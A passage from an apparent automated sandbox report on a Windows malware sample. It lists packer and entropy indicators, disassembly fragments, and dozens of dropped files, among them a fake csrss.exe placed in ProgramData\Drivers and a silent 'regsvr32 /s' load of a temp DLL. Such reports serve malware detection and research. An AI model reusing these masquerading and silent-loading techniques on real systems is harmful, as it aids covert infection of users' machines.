                                Source: is-4ENN3.tmp.30.drStatic PE information: real checksum: 0x0 should be: 0xf050f
                                Source: E36B.exe.1.drStatic PE information: real checksum: 0x42a795 should be: 0x428e69
                                Source: is-N5RMT.tmp.30.drStatic PE information: real checksum: 0x0 should be: 0x17d41
                                Source: A748.dll.1.drStatic PE information: real checksum: 0x0 should be: 0x23d57f
                                Source: FC24.tmp.22.drStatic PE information: real checksum: 0x0 should be: 0xb0a52
                                Source: B43A.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x950f2
                                Source: _setup64.tmp.30.drStatic PE information: real checksum: 0x0 should be: 0x8546
                                Source: is-SK9ML.tmp.30.drStatic PE information: real checksum: 0x0 should be: 0xb5c3
                                Source: is-T6JRC.tmp.30.drStatic PE information: real checksum: 0x0 should be: 0x5dc2c
                                Source: is-AHKA2.tmp.30.drStatic PE information: real checksum: 0x0 should be: 0x60b0b
                                Source: is-JNRFN.tmp.30.drStatic PE information: real checksum: 0x0 should be: 0xcf45
                                Source: _RegDLL.tmp.30.drStatic PE information: real checksum: 0x0 should be: 0xc2b7
                                Source: is-B8UB5.tmp.30.drStatic PE information: real checksum: 0x0 should be: 0x5060
                                Source: _iscrypt.dll.30.drStatic PE information: real checksum: 0x0 should be: 0x89d2
                                Source: is-RL3ER.tmp.30.drStatic PE information: real checksum: 0x0 should be: 0x22a56
                                Source: is-M5V0E.tmp.30.drStatic PE information: real checksum: 0x0 should be: 0xbd140
                                Source: is-CV65T.tmp.30.drStatic PE information: real checksum: 0x0 should be: 0x204aa
                                Source: FC24.tmp.27.drStatic PE information: real checksum: 0x0 should be: 0xb0a52
                                Source: is-O8J8D.tmp.30.drStatic PE information: real checksum: 0x0 should be: 0x346e7
                                Source: FC24.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x81c386
                                Source: is-82753.tmp.30.drStatic PE information: real checksum: 0x0 should be: 0xc1c38
                                Source: is-HI55A.tmp.30.drStatic PE information: real checksum: 0x0 should be: 0x2e339
                                Source: B013.exe.1.drStatic PE information: section name:
                                Source: B013.exe.1.drStatic PE information: section name: .themida
                                Source: B013.exe.1.drStatic PE information: section name: .boot
                                Source: A19A.exe.1.drStatic PE information: section name: _RDATA
                                Source: B43A.exe.1.drStatic PE information: section name: .frAQB
                                Source: A748.dll.1.drStatic PE information: section name: .code
                                Source: VCRUNTIME140.dll.8.drStatic PE information: section name: _RDATA
                                Source: libcrypto-1_1.dll.8.drStatic PE information: section name: .00cfg
                                Source: libssl-1_1.dll.8.drStatic PE information: section name: .00cfg
                                Source: splitcontrolvb.exe.30.drStatic PE information: section name: .cmail
                                Source: is-BN6BT.tmp.30.drStatic PE information: section name: /4
                                Source: is-95FJN.tmp.30.drStatic PE information: section name: /4
                                Source: is-OURMN.tmp.30.drStatic PE information: section name: /4
                                Source: is-LB4R5.tmp.30.drStatic PE information: section name: /4
                                Source: is-4ENN3.tmp.30.drStatic PE information: section name: .trace
                                Source: is-4ENN3.tmp.30.drStatic PE information: section name: _RDATA
                                Source: is-4ENN3.tmp.30.drStatic PE information: section name: .debug_o
                                Source: is-6NO5U.tmp.30.drStatic PE information: section name: /4
                                Source: is-6NO5U.tmp.30.drStatic PE information: section name: /19
                                Source: is-6NO5U.tmp.30.drStatic PE information: section name: /31
                                Source: is-6NO5U.tmp.30.drStatic PE information: section name: /45
                                Source: is-6NO5U.tmp.30.drStatic PE information: section name: /57
                                Source: is-6NO5U.tmp.30.drStatic PE information: section name: /70
                                Source: is-6NO5U.tmp.30.drStatic PE information: section name: /81
                                Source: is-6NO5U.tmp.30.drStatic PE information: section name: /92
                                Source: is-061H5.tmp.30.drStatic PE information: section name: /4
                                Source: is-U6T88.tmp.30.drStatic PE information: section name: /4
                                Source: is-ULAJR.tmp.30.drStatic PE information: section name: /4
                                Source: is-82753.tmp.30.drStatic PE information: section name: .didata
                                Source: is-T6JRC.tmp.30.drStatic PE information: section name: .sxdata
                                Source: is-139BC.tmp.30.drStatic PE information: section name: /4
                                Source: is-HJRAJ.tmp.30.drStatic PE information: section name: /4
                                Source: is-40QD3.tmp.30.drStatic PE information: section name: /4
                                Source: is-AUP01.tmp.30.drStatic PE information: section name: /4
                                Source: is-M3SQC.tmp.30.drStatic PE information: section name:
                                Source: is-M3SQC.tmp.30.drStatic PE information: section name:
                                Source: is-M3SQC.tmp.30.drStatic PE information: section name: petite
                                Source: is-HI55A.tmp.30.drStatic PE information: section name:
                                Source: is-HI55A.tmp.30.drStatic PE information: section name:
                                Source: is-HI55A.tmp.30.drStatic PE information: section name: petite
                                Source: is-M5NA9.tmp.30.drStatic PE information: section name:
                                Source: is-M5NA9.tmp.30.drStatic PE information: section name:
                                Source: is-M5NA9.tmp.30.drStatic PE information: section name: petite
                                Source: is-GR4AC.tmp.30.drStatic PE information: section name:
                                Source: is-GR4AC.tmp.30.drStatic PE information: section name: petite
                                Source: is-LN8F3.tmp.30.drStatic PE information: section name:
                                Source: is-LN8F3.tmp.30.drStatic PE information: section name:
                                Source: is-LN8F3.tmp.30.drStatic PE information: section name: petite
                                Source: is-N5KRR.tmp.30.drStatic PE information: section name:
                                Source: is-N5KRR.tmp.30.drStatic PE information: section name:
                                Source: is-N5KRR.tmp.30.drStatic PE information: section name: petite
                                Source: is-CJH5R.tmp.30.drStatic PE information: section name:
                                Source: is-CJH5R.tmp.30.drStatic PE information: section name: petite
                                Source: is-B8UB5.tmp.30.drStatic PE information: section name:
                                Source: is-B8UB5.tmp.30.drStatic PE information: section name:
                                Source: is-B8UB5.tmp.30.drStatic PE information: section name:
                                Source: is-CV65T.tmp.30.drStatic PE information: section name:
                                Source: is-CV65T.tmp.30.drStatic PE information: section name:
                                Source: is-CV65T.tmp.30.drStatic PE information: section name: petite
                                Source: is-9EJD1.tmp.30.drStatic PE information: section name:
                                Source: is-9EJD1.tmp.30.drStatic PE information: section name:
                                Source: is-9EJD1.tmp.30.drStatic PE information: section name:
                                Source: is-N5RMT.tmp.30.drStatic PE information: section name:
                                Source: is-N5RMT.tmp.30.drStatic PE information: section name:
                                Source: is-N5RMT.tmp.30.drStatic PE information: section name: petite
                                Source: is-8RC7G.tmp.30.drStatic PE information: section name:
                                Source: is-8RC7G.tmp.30.drStatic PE information: section name:
                                Source: is-8RC7G.tmp.30.drStatic PE information: section name: petite
                                Source: is-SK9ML.tmp.30.drStatic PE information: section name:
                                Source: is-SK9ML.tmp.30.drStatic PE information: section name:
                                Source: is-SK9ML.tmp.30.drStatic PE information: section name:
                                Source: is-JNRFN.tmp.30.drStatic PE information: section name:
                                Source: is-JNRFN.tmp.30.drStatic PE information: section name:
                                Source: is-JNRFN.tmp.30.drStatic PE information: section name: petite
                                Source: is-3KPO5.tmp.30.drStatic PE information: section name: /4
                                Source: is-NJ5T1.tmp.30.drStatic PE information: section name: /4
                                Source: is-V43EJ.tmp.30.drStatic PE information: section name: /4
                                Source: is-PK59T.tmp.30.drStatic PE information: section name: /4
                                Source: is-ARAOP.tmp.30.drStatic PE information: section name:
                                Source: is-ARAOP.tmp.30.drStatic PE information: section name:
                                Source: is-ARAOP.tmp.30.drStatic PE information: section name:
                                Source: is-M77GN.tmp.30.drStatic PE information: section name: /4
                                Source: is-QG5TG.tmp.30.drStatic PE information: section name: .eh_fram
                                Source: is-8N3DM.tmp.30.drStatic PE information: section name: asmcode
                                Source: is-5KQFU.tmp.30.drStatic PE information: section name: .eh_fram
                                Source: is-CA7HB.tmp.30.drStatic PE information: section name: /4
                                Source: is-FNH7L.tmp.30.drStatic PE information: section name: /4
                                Source: is-MSK3G.tmp.30.drStatic PE information: section name: /4
                                Source: PDiskSnap75.exe.38.drStatic PE information: section name: .cmail
                                Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\A748.dll
                                Source: C:\Users\user\Desktop\ZRgv8wdMtR.exeCode function: 0_2_004014A1 push es; iretd 0_2_004014A3
                                Source: C:\Users\user\Desktop\ZRgv8wdMtR.exeCode function: 0_2_004022A8 pushfd ; ret 0_2_004022C7
                                Source: C:\Users\user\Desktop\ZRgv8wdMtR.exeCode function: 0_2_0097468B push ss; iretd 0_2_00974691
                                Source: C:\Users\user\Desktop\ZRgv8wdMtR.exeCode function: 0_2_009712E9 push es; iretd 0_2_00971309
                                Source: C:\Users\user\Desktop\ZRgv8wdMtR.exeCode function: 0_2_00971E24 pushfd ; ret 0_2_00971F03
                                Source: C:\Users\user\Desktop\ZRgv8wdMtR.exeCode function: 0_2_009717FF push 8A1E29FAh; iretd 0_2_00971804
                                Source: C:\Users\user\Desktop\ZRgv8wdMtR.exeCode function: 0_2_00977F2C push cs; iretd 0_2_00977F2E
                                Source: C:\Users\user\Desktop\ZRgv8wdMtR.exeCode function: 0_2_0248230F pushfd ; ret 0_2_0248232E
                                Source: C:\Users\user\Desktop\ZRgv8wdMtR.exeCode function: 0_2_02481506 push es; iretd 0_2_0248150A
                                Source: C:\Users\user\AppData\Roaming\wesswwiCode function: 3_2_004014A1 push es; iretd 3_2_004014A3
                                Source: C:\Users\user\AppData\Roaming\wesswwiCode function: 3_2_004022A8 pushfd ; ret 3_2_004022C7
                                Source: C:\Users\user\AppData\Roaming\wesswwiCode function: 3_2_00901506 push es; iretd 3_2_0090150A
                                Source: C:\Users\user\AppData\Roaming\wesswwiCode function: 3_2_0090230F pushfd ; ret 3_2_0090232E
                                Source: C:\Users\user\AppData\Roaming\wesswwiCode function: 3_2_00A6FBC9 push es; iretd 3_2_00A6FBE9
                                Source: C:\Users\user\AppData\Roaming\wesswwiCode function: 3_2_00A700DF push 8A1E29FAh; iretd 3_2_00A700E4
                                Source: C:\Users\user\AppData\Roaming\wesswwiCode function: 3_2_00A70704 pushfd ; ret 3_2_00A707E3
                                Source: C:\Users\user\AppData\Roaming\wesswwiCode function: 3_2_00A7680C push cs; iretd 3_2_00A7680E
                                Source: C:\Users\user\AppData\Roaming\wesswwiCode function: 3_2_00A72F6B push ss; iretd 3_2_00A72F71
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeCode function: 6_2_0287E4BD push cs; ret 6_2_0287E4BE
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeCode function: 6_2_028467ED push ebp; retf 6_2_028467EE
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeCode function: 6_2_027E070A pushad ; ret 6_2_027E070C
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeCode function: 6_2_0287E7F8 push edx; retf 6_2_0287E7F9
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeCode function: 6_2_0284680A push 5A36841Dh; retf 6_2_02846825
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeCode function: 6_2_0278C2EF push ebx; iretd 6_2_0278C2F7
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeCode function: 7_2_00696299 push ecx; ret 7_2_006962AC
                                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04EB242C push esi; mov dword ptr [esp], ecx10_2_04EB242D
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeCode function: 11_2_01E1F4D0 pushad ; iretd 11_2_01E1F4D1
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_00403520 push eax; ret 12_2_00403535
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_00405571 push ecx; ret 12_2_00405584
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_006291CD push ecx; ret 12_2_006291CC
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_005C42E0 push eax; mov dword ptr [esp], 00000000h12_2_005C42E2
                                Source: initial sampleStatic PE information: section name: .text entropy: 7.404290778259079
                                Source: initial sampleStatic PE information: section name: .text entropy: 7.989428351674898
                                Source: initial sampleStatic PE information: section name: .boot entropy: 7.952996187021671
                                Source: initial sampleStatic PE information: section name: .text entropy: 7.4095742461751595
                                Source: initial sampleStatic PE information: section name: .text entropy: 7.404290778259079
                                Source: initial sampleStatic PE information: section name: .text entropy: 7.4095742461751595
                                Source: initial sampleStatic PE information: section name: .text entropy: 7.989428351674898
                                Source: initial sampleStatic PE information: section name: .text entropy: 7.638931440148106
                                Source: initial sampleStatic PE information: section name: entropy: 7.953893773659523
                                Source: initial sampleStatic PE information: section name: entropy: 7.921519965168042
                                Source: initial sampleStatic PE information: section name: entropy: 7.966771808365004
                                Source: initial sampleStatic PE information: section name: entropy: 7.950928332152424
                                Source: initial sampleStatic PE information: section name: entropy: 7.491817342209834
                                Source: initial sampleStatic PE information: section name: .text entropy: 7.638931440148106

                                Persistence and Installation Behavior

                                barindex
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeFile created: C:\ProgramData\Drivers\csrss.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\sqlite3.dll (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\dsd2.dll (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-82753.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\libwebp.dll (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-LB4R5.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI64322\libcrypto-1_1.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-T6JRC.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-4ENN3.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Users\user\AppData\Local\Temp\is-LECMG.tmp\_isetup\_iscrypt.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI64322\unicodedata.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\gain_analysis.dll (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-O8J8D.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-6NO5U.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-AHKA2.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\bassopus.dll (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-M77GN.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\opusenc.exe (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-NPP07.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Users\user\AppData\Local\Temp\is-LECMG.tmp\_isetup\_shfoldr.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\libsox-3.dll (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\libsoxr.dll (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\libdtsdec.dll (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-9EJD1.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\FC24.exeFile created: C:\Users\user\AppData\Local\Temp\is-EM1CB.tmp\FC24.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-CA7HB.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\dsd2pcmt.dll (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI64322\select.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-40QD3.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\utils.dll (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-AUP01.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\libmp4v2.dll (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\bass_aac.dll (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-061H5.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI64322\_lzma.pydJump to dropped file
                                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wesswwiJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-B8UB5.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI64322\tcl86t.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-N5KRR.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-M3SQC.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-8N3DM.tmpJump to dropped file
                                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B43A.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-HI55A.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-3KPO5.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\lame_enc.dll (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\FC24.exeFile created: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\basscd.dll (copy)Jump to dropped file
                                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\FC24.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\wavpackdll.dll (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-U6T88.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-CJH5R.tmpJump to dropped file
                                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A19A.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI64322\python37.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI64322\_hashlib.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI64322\_ssl.pydJump to dropped file
                                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B013.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI64322\_ctypes.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-ULAJR.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-V43EJ.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\bassflac.dll (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exeFile created: C:\ProgramData\PDiskSnap75\PDiskSnap75.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI64322\libssl-1_1.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-FNH7L.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\d_writer.dll (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-MSK3G.tmpJump to dropped file
                                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A748.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\da.dll (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-BN6BT.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\7z.exe (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI64322\_tkinter.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI64322\tk86t.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\bass.dll (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\takdec.exe (copy)Jump to dropped file
                                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\E36B.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\libwinpthread-1.dll (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\rg_ebur128.dll (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-5N34J.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Users\user\AppData\Local\Temp\is-LECMG.tmp\_isetup\_isdecmp.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\bass_tta.dll (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-N5RMT.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-LN8F3.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\OptimFROG.dll (copy)Jump to dropped file
                                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\CA06.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Users\user\AppData\Local\Temp\is-LECMG.tmp\_isetup\_setup64.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Users\user\AppData\Local\Temp\is-LECMG.tmp\_isetup\_RegDLL.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\basswma.dll (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-SK9ML.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\bassmidi.dll (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\is-M5V0E.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\bassape.dll (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\bass_ofr.dll (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\dstt.dll (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\mp3gain.exe (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\is-M5NA9.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB\bin\x86\tak_deco_lib.dll (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeFile created: C:\ProgramData\Drivers\csrss.exeJump to dropped file
